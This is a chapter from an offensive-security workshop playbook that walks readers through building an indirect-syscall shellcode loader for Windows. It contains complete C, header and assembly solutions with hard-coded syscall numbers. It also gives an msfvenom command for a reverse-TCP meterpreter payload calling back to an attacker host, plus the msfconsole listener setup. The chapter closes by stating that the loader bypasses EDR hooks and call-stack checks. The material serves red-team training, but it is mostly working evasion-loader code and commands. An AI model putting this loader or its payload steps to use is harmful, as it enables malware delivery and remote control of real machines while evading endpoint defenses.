14: Chapter 7 | LAB Exercise Playbook
Related to the Win32-API loader, in this exercise we will make the third modification, creating the indirect syscall loader.
The main difference between the direct syscall loader and the indirect syscall loader is that only part of a native function's syscall stub is implemented in the indirect syscall loader itself. We implement and execute `mov r10, rcx`, `mov eax, SSN` and `jmp qword ptr` in the indirect syscall loader, but unlike the direct syscall loader, we do not execute the `syscall` and `ret` (return) instructions from the loader's own memory. Instead, the unconditional jump `jmp qword ptr` transfers execution to the address of the `syscall` instruction of the native function in `ntdll.dll`, so that `syscall` and `ret` are executed from the memory of `ntdll.dll`. Why exactly this is an advantage over direct syscalls in terms of EDR evasion is discussed in detail in Chapter 8, where we compare the call stacks of our various shellcode loaders.
The code template for this tutorial can be found here.
Task Nr. | Task Description |
---|---|
1 | Download the indirect syscall loader POC for this chapter. |
2 | Most of the code is already implemented in the POC. However, you have to complete the indirect syscall loader by performing the following tasks:
|
3 | Create a staged x64 meterpreter shellcode with msfvenom, copy it to the POC and compile the POC. |
4 | Create and run a staged x64 meterpreter listener using msfconsole. |
5 | Run your compiled .exe and check that a stable command and control channel opens. |
Task Nr. | Task Description |
---|---|
6 | Use the Visual Studio dumpbin tool to analyse the syscall loader. Are any Win32 APIs being imported from kernel32.dll ? Is the result what you expected? |
7 | Use x64dbg to debug or analyse the loader.
|
You can download the POC from the code section of this chapter. The code works as follows. The shellcode is declared as before.
// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
unsigned char code[] = "\xfc\x48\x83";
As mentioned at the beginning of this chapter, we want to execute the `syscall` and `ret` instructions of the syscall stub of each native function we use from the memory of `ntdll.dll`. Therefore, at the right time, we need to jump from the memory of the indirect syscall loader to the address of the `syscall` instruction of the corresponding native function in the memory of `ntdll.dll`. This is done by executing `jmp qword ptr` in the indirect syscall loader after `mov r10, rcx` and `mov eax, SSN` have been executed. To do this using Windows APIs, we need to do the following:
- Open a handle to `ntdll.dll` at runtime using `GetModuleHandleA`.
- Get the start address of the native function in `ntdll.dll` using `GetProcAddress` and store it in a variable declared as a function pointer.
- Get the memory address of the `syscall` instruction in the syscall stub by adding the required offset and store it in a variable declared as a global variable.
First, we want to use the following code, which uses the function `GetModuleHandleA` to open a handle to `ntdll.dll` at runtime. This code is already implemented in the indirect syscall POC.
Code
// Get a handle to the ntdll.dll library
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (hNtdll == NULL) {
// Handle the error, for example, print an error message and return.
printf("Error: the specified module could not be found.");
return 1; // Or any other non-zero value, since typically a zero return indicates success
}
Then we want to use the following code, which uses the `GetProcAddress` function to get the start address of the respective native function in the memory of `ntdll.dll` and stores it in a pointer-sized variable (`UINT_PTR`).
In the indirect syscall POC, this code is implemented only for the native function `NtAllocateVirtualMemory` and must be completed by the workshop attendee, following the pattern for `NtAllocateVirtualMemory` shown in the code section below.
Code
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");
In the next step, we want to get the memory address of the `syscall` instruction in the syscall stub of the native function by adding the necessary offset to the start address of the native function that we retrieved in the previous step. To get the address of the `syscall` instruction, we need to add `0x12` bytes (18 in decimal). Why exactly 0x12 bytes? In an unhooked x64 syscall stub on Windows 10, the `syscall` instruction is preceded by `mov r10, rcx` (3 bytes), `mov eax, SSN` (5 bytes), a `test` instruction (8 bytes) and a `jne` instruction (2 bytes), which adds up to 18 bytes from the start address of the native function.
In the indirect syscall POC, this code is implemented only for the native function `NtAllocateVirtualMemory` and must be completed by the workshop attendee, following the pattern for `NtAllocateVirtualMemory` shown in the code section below.
Code
// The syscall instruction is located some bytes after the start of the native function's stub.
// In this case, the offset is assumed to be 0x12 (18 in decimal) bytes from the start of the function.
// So we add 0x12 to the function's address to get the address of the syscall instruction.
sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// The syscall instruction is located some bytes after the start of the native function's stub.
// In this case, the offset is assumed to be 0x12 (18 in decimal) bytes from the start of the function.
// So we add 0x12 to the function's address to get the address of the syscall instruction.
sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;
To store the memory address of the `syscall` instruction of the respective native function, and to make that address available to the assembly code in the `syscalls.asm` file, we declare one global variable per `syscall` address. Each variable is of type `UINT_PTR`, an unsigned integer the size of a pointer.
Also in this case, the indirect syscall POC implements this code only for the native function `NtAllocateVirtualMemory`, and it must be completed by the workshop attendee, following the pattern for `NtAllocateVirtualMemory` shown in the code section below.
Code
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;
Like the direct syscall loader, we no longer ask `ntdll.dll` for the function definitions of the native APIs we use. But we still want to use the native functions, so we need to declare the prototypes of all four native functions ourselves in a header file. In this case, the header file should be called `syscalls.h`.
The `syscalls.h` file does not currently exist in the syscall POC folder. Your task is to add a new header file named `syscalls.h` and implement the required code. The code for the `syscalls.h` file can be found in the code section below. You will also need to include the header `syscalls.h` in the main code.
If you want to check a function definition manually, additional information should be available in the Microsoft documentation, e.g. for NtAllocateVirtualMemory.
Code
#ifndef _SYSCALLS_H // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H // Define _SYSCALLS_H
#include <windows.h> // Include the Windows API header
// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS; // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS; // Define a pointer to NTSTATUS
// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle, // Handle to the process in which to allocate the memory
PVOID* BaseAddress, // Pointer to the base address
ULONG_PTR ZeroBits, // Number of high-order address bits that must be zero in the base address of the section view
PSIZE_T RegionSize, // Pointer to the size of the region
ULONG AllocationType, // Type of allocation
ULONG Protect // Memory protection for the region of pages
);
// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
HANDLE ProcessHandle, // Handle to the process in which to write the memory
PVOID BaseAddress, // Pointer to the base address
PVOID Buffer, // Buffer containing data to be written
SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);
// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
PHANDLE ThreadHandle, // Pointer to a variable that receives a handle to the new thread
ACCESS_MASK DesiredAccess, // Desired access to the thread
PVOID ObjectAttributes, // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
HANDLE ProcessHandle, // Handle to the process in which the thread is to be created
PVOID lpStartAddress, // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
PVOID lpParameter, // Pointer to a variable to be passed to the thread
ULONG Flags, // Flags that control the creation of the thread
SIZE_T StackZeroBits, // Number of high-order address bits that must be zero in the stack pointer
SIZE_T SizeOfStackCommit, // The size of the stack that must be committed at thread creation
SIZE_T SizeOfStackReserve, // The size of the stack that must be reserved at thread creation
PVOID lpBytesBuffer // Pointer to a variable that receives any output data from the system
);
// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
HANDLE Handle, // Handle to the object to be waited on
BOOLEAN Alertable, // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
PLARGE_INTEGER Timeout // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);
#endif // _SYSCALLS_H // End of the _SYSCALLS_H definition
As in the direct syscall loader, we do not want to ask `ntdll.dll` for the contents of the syscall stub (the assembly instructions `mov r10, rcx`, `mov eax, SSN`, etc.) of the native functions we use. Instead, we implement the necessary assembly code in the loader itself. But compared to the direct syscall loader, in the indirect syscall loader we only implement part of the syscall stub directly. That is, we implement `mov r10, rcx` and `mov eax, SSN`, but we replace the `syscall` instruction with an unconditional jump instruction `jmp qword ptr`. This allows us to jump to the memory address of the `syscall` instruction in the memory of `ntdll.dll`, so that the `syscall` and `ret` instructions are executed in the memory of `ntdll.dll`.
Also in this case, instead of using a tool to generate the necessary assembly instructions, we will implement the assembly code manually in our indirect syscall POC for the best learning experience. To do this, you will find a file called `syscalls.asm` in the indirect syscall loader POC directory, which contains some of the required assembly code. Compared to the direct syscall loader POC, the `syscalls.asm` file of the indirect syscall loader POC needs access to the memory address of the respective `syscall` instruction. This is necessary to perform the jump into the memory of `ntdll.dll`.
The code below shows the assembly code for the syscall stub of `NtAllocateVirtualMemory`, which is already implemented in the `syscalls.asm` file.
Code
EXTERN sysAddrNtAllocateVirtualMemory:QWORD ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
.CODE ; Start the code section
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
mov r10, rcx ; Copy the first argument from rcx to r10. This is necessary because the syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
mov eax, 18h ; Move the syscall number into the eax register.
jmp QWORD PTR [sysAddrNtAllocateVirtualMemory] ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP ; End of the procedure.
END ; End of the module
It is your task to add the `syscalls.asm` file as a resource (existing item) to the indirect syscall loader project and complete the assembly code and C code for the other three missing native APIs `NtWriteVirtualMemory`, `NtCreateThreadEx` and `NtWaitForSingleObject`.
If you are unable to complete the assembly code at this time, you can use the assembly code from the solution and paste it into the `syscalls.asm` file in the indirect syscall loader POC. Note that the syscall IDs (SSNs) are for Windows 10 Enterprise 22H2 and may not work for your target. You may need to replace them with the correct syscall IDs for your target Windows version.
Solution
EXTERN sysAddrNtAllocateVirtualMemory:QWORD ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD ; The actual address of the NtWriteVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD ; The actual address of the NtCreateThreadEx syscall in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD ; The actual address of the NtWaitForSingleObject syscall in ntdll.dll.
.CODE ; Start the code section
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
mov r10, rcx ; Copy the first argument from rcx to r10. This is necessary because the syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
mov eax, 18h ; Move the syscall number into the eax register.
jmp QWORD PTR [sysAddrNtAllocateVirtualMemory] ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP ; End of the procedure.
; Similar procedures for NtWriteVirtualMemory syscalls
NtWriteVirtualMemory PROC
mov r10, rcx
mov eax, 3Ah
jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP
; Similar procedures for NtCreateThreadEx syscalls
NtCreateThreadEx PROC
mov r10, rcx
mov eax, 0C2h
jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP
; Similar procedures for NtWaitForSingleObject syscalls
NtWaitForSingleObject PROC
mov r10, rcx
mov eax, 4
jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP
END ; End of the module
We have already implemented all the necessary assembly code in the `syscalls.asm` file. But in order for the code to be assembled correctly within the indirect syscall POC, we need to do a few things. These steps are not done in the downloadable POC and must be done manually.
First, we need to enable support for Microsoft Macro Assembler (MASM) in the Visual Studio project by enabling the option in Build Dependencies/Build Customisations.
We also need to set the item type of the `syscalls.asm` file to Microsoft Macro Assembler, otherwise we will get an unresolved symbol error for the native APIs used in the indirect syscall loader. We also set "Excluded from Build" to no and "Content" to yes.
Again, we will create our meterpreter shellcode with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.
kali>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt
The shellcode can then be copied into the indirect syscall loader POC by replacing the placeholder in the unsigned char array, and the POC can be compiled as an x64 release.
Before we test the functionality of our indirect syscall loader, we need to create a listener within msfconsole.
kali>
msfconsole
msf>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80
set exitonsession false
run
Once the listener has been successfully started, you can run your compiled indirect syscall loader. If all goes well, you should see an incoming command and control session.
The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via `kernel32.dll`. The following command can be used to check the imports. Which results do you expect?
cmd>
cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Path/to/Direct_Syscall_Dropper.exe
Results
There are no imports of the Windows APIs `VirtualAlloc`, `WriteProcessMemory`, `CreateThread` and `WaitForSingleObject` from `kernel32.dll`. This was expected and is correct.
The first step is to run your indirect syscall loader and check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process. Note that if you open the indirect syscall loader directly in x64dbg, you need to run the executable first.
Then we want to check which APIs (Win32 or Native) are being imported and from which module or memory location. Remember that in the indirect syscall loader we no longer use Win32 APIs in the code and have implemented the structure for the native functions directly in the assembly. What results do you expect?
Results
Checking the imported symbols of our indirect syscall loader, we should again see that the Win32 APIs `VirtualAlloc`, `WriteProcessMemory`, `CreateThread` and `WaitForSingleObject` are no longer imported from `kernel32.dll`, or from any other module. So the result matches the dumpbin output and appears to be valid.
Also, looking at the imported symbols (Symbols tab), we see that instead of asking `ntdll.dll` for the code of the four required native functions `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtCreateThreadEx` and `NtWaitForSingleObject`, these native functions are implemented directly in the `.text` section of the shellcode loader.
We use the "Follow in Disassembler" function to analyse the indirect syscall loader to identify the lines of code where the calls to the native functions are made.
We also want to identify the disassembled lines of code where `GetModuleHandleA` is used to open a handle to `ntdll.dll` and `GetProcAddress` is used to get the start address of the native function. We also want to identify the disassembled code where the address of the respective `syscall` instruction is calculated by adding `0x12` bytes (18 in decimal) as an offset to the start address.
Results
We can identify the lines of code used to open a handle to `ntdll.dll` using `GetModuleHandleA`, then get the start address of the native functions using `GetProcAddress`, and finally calculate the address of the `syscall` instruction by adding `0x12` bytes (18 in decimal) as an offset to the start address of the respective native function.
Also in the case of the indirect syscall loader we want to check in which module the syscall stub or the assembler instructions of the native functions are implemented and executed. Remember, unlike the direct syscall loader from the previous chapter, in the indirect syscall loader POC we have only implemented part of the syscall stub directly into the loader itself. What results do you expect?
Results
For example, in the context of the native function `NtAllocateVirtualMemory`, we use the "Follow in Disassembler" function and should see that the complete syscall stub is not taken from `ntdll.dll`. In the case of the indirect syscall loader, only part of the assembly instructions is implemented directly in the `.text` section of the loader. Furthermore, we can see that the unconditional jump into the memory of `ntdll.dll` is done via `jmp qword ptr`, and that the `syscall` and `ret` instructions are executed from the memory of `ntdll.dll`.
- Made the transition from direct syscalls to indirect syscalls.
- The loader no longer imports Windows APIs from `kernel32.dll`.
- The loader no longer imports Native APIs from `ntdll.dll`.
- Only part of the syscall stub is implemented directly in the `.text` section of the shellcode loader.
- The `syscall` and `ret` instructions are executed from the memory of `ntdll.dll`.
- User-mode hooks placed in `ntdll.dll` by an EDR can be bypassed.
- EDR detection based on checking the `syscall` and return address in the call stack can be bypassed.
- System Service Numbers (SSNs) are hard-coded into the POC.
- If one or more of the Native APIs used are hooked by the EDR, depending on the EDR, the execution of the shellcode is likely to fail.
- If an EDR uses Event Tracing for Windows (ETW) or Event Tracing for Windows Threat Intelligence (EtwTi) to check the entire call stack, rather than just the memory area from which the syscall was executed and/or the return address, then indirect syscalls are likely to fail.